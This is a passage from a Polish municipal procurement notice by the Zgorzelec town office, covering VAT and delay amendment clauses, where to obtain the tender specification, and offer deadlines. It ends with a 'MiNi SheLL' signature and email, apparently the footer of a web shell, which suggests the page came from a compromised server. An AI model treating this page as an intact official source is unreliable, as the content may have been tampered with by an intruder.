8.	Jeżeli w trakcie obowiązywania umowy z Wykonawcą zostaną zmienione przepisy podatkowe i zmianie ulegnie stawka VAT na realizację przedmiotu zamówienia, Zamawiający podpisze                              z Wykonawcą aneks do umowy zmieniający stawkę VAT                      i w konsekwencji cenę brutto. (zaoferowana przez Wykonawcę w ofercie wartość netto zostanie powiększona lub pomniejszona                        o aktualnie obowiązującą stawkę VAT).

2.	Warunkiem wprowadzenia zmian do zawartej umowy będzie potwierdzenie powstałych okoliczności w formie opisowej i właściwie umotywowanej, potwierdzonej przez każdą ze stron umowy. 
3.	Strony ustalają 7 dniowy termin na złożenie wniosku dot. wprowadzenia powyższych zmian, licząc od dnia w którym zaistniały przesłanki do ich wprowadzenia. 
4.	 W przedstawionych w  pkt. 1 ppkt. 2  - z wyłączeniem ppkt. 7 oraz 8 - przypadkach wystąpienia opóźnień, strony ustalają nowe terminy realizacji, z tym że okres przesunięcia terminu zakończenia równy będzie co najmniej okresowi przerwy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.um-zgorzelec.dolnyslask.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Zgorzelcu
59-900 Zgorzelec, ul. Domańskiego 6,pokój nr 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.01.2011 godzina 10:00, miejsce: w siedzibie  Zamawiającego tj.:
Punkt Obsługi Interesanta
Urząd Miasta w Zgorzelcu, 59-900 Zgorzelec, ul. Domańskiego 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com